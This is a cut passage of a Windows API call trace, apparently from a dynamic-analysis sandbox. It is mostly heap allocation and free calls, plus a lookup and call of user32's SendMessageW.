(HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf4170 [0248.365] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe526f0 [0248.365] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d4b8 [0248.365] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4188 [0248.366] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52700 [0248.366] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52700 | out: hHeap=0xbe0000) returned 1 [0248.366] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4188 | out: hHeap=0xbe0000) returned 1 [0248.366] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d4b8 | out: hHeap=0xbe0000) returned 1 [0248.366] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526f0 | out: hHeap=0xbe0000) returned 1 [0248.366] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf40c8 | out: hHeap=0xbe0000) returned 1 [0248.366] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf40b0 | out: hHeap=0xbe0000) returned 1 [0248.366] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf40e0 | out: hHeap=0xbe0000) returned 1 [0248.366] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf40f8 | out: hHeap=0xbe0000) returned 1 [0248.366] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4110 | out: hHeap=0xbe0000) returned 1 [0248.366] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4140 | out: hHeap=0xbe0000) returned 1 [0248.366] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4128 | out: hHeap=0xbe0000) returned 1 [0248.366] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4158 | out: hHeap=0xbe0000) returned 1 [0248.366] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4170 | out: hHeap=0xbe0000) returned 1 [0248.366] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d490 | out: hHeap=0xbe0000) returned 1 [0248.366] PeekMessageW (in: lpMsg=0x8bf6ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf6ac) returned 0 [0248.366] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe526f0 [0248.366] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d490 [0248.366] CharUpperBuffW (in: lpsz="_SENDMESSAGE", cchLength=0xc | out: lpsz="_SENDMESSAGE") returned 0xc [0248.366] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d490 | out: hHeap=0xbe0000) returned 1 [0248.366] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526f0 | out: hHeap=0xbe0000) returned 1 [0248.366] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d490 [0248.366] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1) returned 0xe526f0 [0248.367] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d4b8 [0248.367] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4170 [0248.367] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52700 [0248.367] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52700 | out: hHeap=0xbe0000) returned 1 [0248.367] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1) returned 0xe52700 [0248.367] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4158 [0248.367] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52710 [0248.367] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52710 | out: hHeap=0xbe0000) returned 1 [0248.367] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1) returned 0xe52710 [0248.367] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4128 [0248.367] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52720 [0248.367] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52720 | out: hHeap=0xbe0000) returned 1 [0248.367] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf4140 [0248.367] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d4e0 [0248.367] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4110 [0248.367] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52720 [0248.367] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf40f8 [0248.367] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d508 [0248.367] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf40e0 [0248.367] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52730 [0248.367] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf40b0 [0248.368] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d530 [0248.368] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf40c8 [0248.368] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52740 [0248.368] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4188 [0248.368] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52750 [0248.368] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52750 | out: hHeap=0xbe0000) returned 1 [0248.368] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d558 [0248.368] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41a0 [0248.368] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52750 [0248.368] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41b8 [0248.368] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52760 [0248.368] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52760 | out: hHeap=0xbe0000) returned 1 [0248.368] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d580 [0248.368] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41d0 [0248.368] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52760 [0248.368] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41e8 [0248.368] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52770 [0248.368] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4200 [0248.368] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52770 | out: hHeap=0xbe0000) returned 1 [0248.368] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d5a8 [0248.368] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4218 [0248.368] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52770 [0248.369] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4218 | out: hHeap=0xbe0000) returned 1 [0248.369] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d5d0 [0248.369] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4218 [0248.369] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4230 [0248.369] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52780 [0248.369] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4200 | out: hHeap=0xbe0000) returned 1 [0248.369] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4200 [0248.369] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52780 | out: hHeap=0xbe0000) returned 1 [0248.369] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d5f8 [0248.369] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4248 [0248.369] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52780 [0248.369] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4248 | out: hHeap=0xbe0000) returned 1 [0248.369] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d620 [0248.369] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4248 [0248.369] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4260 [0248.369] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52790 [0248.369] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4200 | out: hHeap=0xbe0000) returned 1 [0248.369] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4200 [0248.369] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52790 | out: hHeap=0xbe0000) returned 1 [0248.369] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d648 [0248.369] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4278 [0248.369] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52790 [0248.370] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4278 | out: hHeap=0xbe0000) returned 1 [0248.370] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d670 [0248.370] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4278 [0248.370] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4290 [0248.370] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe01658 [0248.370] PeekMessageW (in: lpMsg=0x8bf454, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf454) returned 0 [0248.370] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d698 [0248.370] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf42a8 [0248.370] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe527a0 [0248.370] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf42c0 [0248.370] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf42d8 [0248.370] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe527b0 [0248.370] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf42d8 | out: hHeap=0xbe0000) returned 1 [0248.370] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d6c0 [0248.370] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf42d8 [0248.370] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe527c0 [0248.370] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf42f0 [0248.370] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527c0 | out: hHeap=0xbe0000) returned 1 [0248.370] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4308 [0248.370] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe527c0 [0248.370] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4320 [0248.371] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527c0 | out: hHeap=0xbe0000) returned 1 [0248.371] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4338 [0248.371] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe527c0 [0248.371] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4350 [0248.371] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527c0 | out: hHeap=0xbe0000) returned 1 [0248.371] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4368 [0248.371] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe527c0 [0248.371] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4380 [0248.371] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527c0 | out: hHeap=0xbe0000) returned 1 [0248.371] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4398 [0248.371] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe527c0 [0248.371] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527c0 | out: hHeap=0xbe0000) returned 1 [0248.371] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf43b0 [0248.371] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe527c0 [0248.371] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf43c8 [0248.371] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527c0 | out: hHeap=0xbe0000) returned 1 [0248.371] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf43e0 [0248.371] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe527c0 [0248.371] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527c0 | out: hHeap=0xbe0000) returned 1 [0248.371] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf43f8 [0248.371] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe527c0 [0248.371] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4410 [0248.372] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527c0 | out: hHeap=0xbe0000) returned 1 [0248.372] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe016a0 [0248.372] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d6c0 | out: hHeap=0xbe0000) returned 1 [0248.372] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4428 [0248.372] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe527c0 [0248.372] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527c0 | out: hHeap=0xbe0000) returned 1 [0248.372] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4440 [0248.372] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe527c0 [0248.372] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4458 [0248.372] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527c0 | out: hHeap=0xbe0000) returned 1 [0248.372] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4470 [0248.372] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe527c0 [0248.372] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527c0 | out: hHeap=0xbe0000) returned 1 [0248.372] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe527c0 [0248.372] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4488 [0248.372] CharLowerBuffW (in: lpsz="lresult", cchLength=0x7 | out: lpsz="lresult") returned 0x7 [0248.372] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf44a0 [0248.372] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe527d0 [0248.372] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe527e0 [0248.372] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf44b8 [0248.372] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf44a0 | out: hHeap=0xbe0000) returned 1 [0248.372] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527d0 | out: hHeap=0xbe0000) returned 1 [0248.372] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf44b8 | out: hHeap=0xbe0000) returned 1 [0248.373] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527e0 | out: hHeap=0xbe0000) returned 1 [0248.373] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d6c0 [0248.373] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe527e0 [0248.373] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf44b8 [0248.373] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe527d0 [0248.373] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe527f0 [0248.373] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf44a0 [0248.373] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf44b8 | out: hHeap=0xbe0000) returned 1 [0248.373] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527d0 | out: hHeap=0xbe0000) returned 1 [0248.373] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf44a0 | out: hHeap=0xbe0000) returned 1 [0248.373] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527f0 | out: hHeap=0xbe0000) returned 1 [0248.373] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe527f0 [0248.373] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf44a0 [0248.373] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe527d0 [0248.373] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52800 [0248.373] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf44b8 [0248.373] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf44a0 | out: hHeap=0xbe0000) returned 1 [0248.373] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527d0 | out: hHeap=0xbe0000) returned 1 [0248.373] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf44b8 | out: hHeap=0xbe0000) returned 1 [0248.373] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52800 | out: hHeap=0xbe0000) returned 1 [0248.373] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52800 [0248.373] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf44b8 [0248.374] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe527d0 [0248.374] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52810 [0248.374] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf44a0 [0248.374] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf44b8 | out: hHeap=0xbe0000) returned 1 [0248.374] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527d0 | out: hHeap=0xbe0000) returned 1 [0248.374] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf44a0 | out: hHeap=0xbe0000) returned 1 [0248.374] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52810 | out: hHeap=0xbe0000) returned 1 [0248.374] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52810 [0248.374] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf44a0 [0248.374] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe527d0 [0248.374] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52820 [0248.374] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf44b8 [0248.374] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf44a0 | out: hHeap=0xbe0000) returned 1 [0248.374] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527d0 | out: hHeap=0xbe0000) returned 1 [0248.374] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf44b8 | out: hHeap=0xbe0000) returned 1 [0248.374] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52820 | out: hHeap=0xbe0000) returned 1 [0248.374] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76e00000 [0248.375] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf44b8 [0248.375] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52820 [0248.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SendMessageW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0248.375] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xd) returned 0xdf44a0 [0248.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SendMessageW", cchWideChar=13, lpMultiByteStr=0xdf44a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMessageW", lpUsedDefaultChar=0x0) returned 13 [0248.375] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf44a0 | out: hHeap=0xbe0000) returned 1 [0248.375] GetProcAddress (hModule=0x76e00000, lpProcName="SendMessageW") returned 0x76e19679 [0248.375] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf44b8 | out: hHeap=0xbe0000) returned 1 [0248.375] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52820 | out: hHeap=0xbe0000) returned 1 [0248.375] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d6e8 [0248.375] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52820 [0248.375] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe527d0 [0248.375] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52830 [0248.375] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52840 [0248.376] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52820 | out: hHeap=0xbe0000) returned 1 [0248.376] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527d0 | out: hHeap=0xbe0000) returned 1 [0248.376] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52830 | out: hHeap=0xbe0000) returned 1 [0248.376] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52840 | out: hHeap=0xbe0000) returned 1 [0248.376] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d6e8 | out: hHeap=0xbe0000) returned 1 [0248.376] SendMessageW (hWnd=0x20168, Msg=0xc5, wParam=0x3b9ac9ff, lParam=0x0) returned 0x1 [0248.376] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52840 [0248.376] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x214) returned 0xe636b8 [0248.376] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x14) returned 0xd01010 [0248.376] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf44b8 [0248.376] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf44a0 [0248.376] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf44d0 [0248.376] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52830 [0248.377] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf44d0 | out: hHeap=0xbe0000) returned 1 [0248.377] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52830 | out: hHeap=0xbe0000) returned 1 [0248.377] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf44a0 | out: hHeap=0xbe0000) returned 1 [0248.377] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf44a0 [0248.377] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf44d0 [0248.377] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf44e8 [0248.377] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52830 [0248.377] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf44e8 | out: hHeap=0xbe0000) returned 1 [0248.377] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52830 | out: hHeap=0xbe0000) returned 1 [0248.377] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf44d0 | out: hHeap=0xbe0000) returned 1 [0248.377] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf44d0 [0248.377] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf44e8 [0248.377] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4500 [0248.377] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52830 [0248.377] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4500 | out: hHeap=0xbe0000) returned 1 [0248.377] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52830 | out: hHeap=0xbe0000) returned 1 [0248.377] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf44e8 | out: hHeap=0xbe0000) returned 1 [0248.377] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf44e8 [0248.377] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4500 [0248.377] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4518 [0248.377] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52830 [0248.377] HeapFree (in: hHeap=0xbe0000, 